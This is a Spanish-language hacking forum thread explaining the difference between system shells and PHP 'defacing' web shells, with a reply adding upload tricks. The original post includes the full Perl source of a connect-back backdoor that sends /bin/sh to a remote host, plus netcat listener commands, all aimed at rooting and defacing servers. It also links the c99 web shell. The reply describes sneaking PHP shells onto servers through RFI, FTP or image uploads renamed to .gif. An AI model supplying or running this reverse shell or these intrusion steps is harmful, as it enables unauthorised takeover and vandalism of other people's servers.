Diferencias entre shell de sistema y shell de defacing by her0

[Malvinas]

Ps bien ultimamente me encontrado k' los k' se inician en este mundo del hacking no saben diferenciar una shell de sistema y una shell de defacing en php y en este pequeño texto pretendo explicar las diferencias entre cada una para haci kede claro k' es cada cosa y no se confundan al leer algun texto =).

Empesemos

K' es una shell: Una shell es la k' te permite interactuar remotamente con alguna pc o server remoto para haci poder ejecutar comandos y poder sacar algo a tu veneficio.(by me)

Haora marquemos las diferencias entre shell del sistema y shell en php(o de defacing)

Shell de sistema:

Bien la shell de sistema es la consola, si estas en windows el ms-dos y esta en linux la terminal...... ...

Otra seria el netcat....es otro ejemplo de shell de sistema.

Este tipo de Shell trabaja mas directamente con el servidor y se usa para rootear.

Shell de defacing o de php:


Para ver este enlace Registrate o Inicia Sesion esta es una shell de defacing escrita en php, pero por k' no la pongo en php en mi host? por la razon de k' no kiero k' mi server la interprete ya k' php es un lenguaje del lado del servidor es decir k' tu navegador no interpreta el codigo si no el server =).

Estas shell mediante codigo en php se aprovechan de bugs de rfi y haciendo la inclusion de la shell podemos ejecutar comandos, editar archivos,etc

Pero estas shells no trabajan en tiempo real ya k' tiene k' pasar por varios filtros...haci  k' por esta razon no se usan para rootear .

Estas shell es en php tiene una interfaz grafica muy amigable k te permite moverte con mayor facilidad dentro del server y haci poder hacer el tan preciado deface =).

Conclusiones:
De cualkier manera los 2 tipos de shell nos pueden ayudar a defacear un host, ya k' por si no lo saben todos los servidores tiene permisos de escritura en el directorio /tmp/ entonces con un backdoor de inversa y poniendo a la escucha el netcat obtendremos una shell de sistema remota y haci pode rootear un server, acontinuacion les pongo el code de un backdoor en perl:
*Inicio Code*
#!/usr/bin/perl

use Socket;

print "Data Cha0s Connect Back Backdoor\n\n";

if (!$ARGV[0]) {

printf "Usage: $0 [Host] \n";

exit(1);

}

print "

• Dumping Arguments\n";

$host = $ARGV[0];

$port = 80;

if ($ARGV[1]) {

$port = $ARGV[1];

}

print "

• Connecting...\n";

$proto = getprotobyname('tcp') || die("Unknown Protocol\n");

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");

my $target = inet_aton($host);

if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {

die("Unable to Connect\n");

}

print "

• Spawning Shell\n";

if (!fork( )) {

open(STDIN,">&SERVER");

open(STDOUT,">&SERVER");

open(STDERR,">&SERVER");

exec {'/bin/sh'} '-bash' . "\0" x 4;

exit(0);

}

print "

• Datached\n\n";

*Final Code*

Lo usarian de esta forma perl archivo.pl tuip puertoenelk'tienesalaescuc hanetcatxD
El netcat lo pondras a la escucha de esta manera nc -vvlp puertok'kieras

Despedida:

Espero k' con este texto kede mas claro las diferencias entre ambas shells y su uso mas comun y k' se puede hacer con una y k' no se puede hacer con otra =)

Si copias este texto respeta el autor del mismo y no cambies nada, hasta k' no te autorice xD, para contactarme para k' le cambies algo aki: 16.her0@gmail.com

Greetz: Antrax,Azrael,DADE,Malvinas,Cvir.system,Darkness-mx,Sat,Mane815,Slappter,Freak,Hiro,Y todos los k' conosco xD.

Fuente:
Para ver este enlace Registrate o Inicia Sesion

Slot Informáticos

.

[kronix]

exelente texto 
aunque hay dos partecitas que como que confunden al lector..
solo es de aclarar:

Código:

http://usuarios.lycos.es/her016/c99.txt esta es una shell de defacing escrita en php, pero por k' no la pongo en php en mi host? por la razon de k' no kiero k' mi server la interprete ya k' php es un lenguaje del lado del servidor es decir k' tu navegador no interpreta el codigo si no el server =).

[b]Estas shell mediante codigo en php se aprovechan de bugs de rfi y haciendo la inclusion de la shell podemos ejecutar comandos, editar archivos,etc[/b]

las PHPSHELL no necesariamente tienen que ser usadas con el RFI, lamentablement e los primeros manuales de defacing (los que mas han sirculado) todos dicen que la manera de usar una PHPshell es mediante RFI, bueno RFI es una cosa y PHPshell otra..
EL RFI es un bug de php que te permite incluir en su sistema un archivo
este archivo podria ser un .php y este .php podria ser una PHPshell, por lo tanto podrian ejecutar comando shell dentro del php y haci vulnerar el server

en la parte resaltada con negrita nos da a entender que las PHPSHELL se aprobechan de RFI (Remote File Inclusion) lo cual no es asi.

una PHPshell es comunicador entre la consola del server y nosotros..
y no solamente se puede usar por medio de RFI, tambien podemos subirla por FTP (si tenemos acceso) o si encontramos un upload de imagenes en la web, pues la renombramos a .gif que igualmente nos funcionara 
lastima que cada ves hay mas server en safe mode, tando "defacer" cada ves es mas dificil encontrar server que permita la ejecucion de comandos shell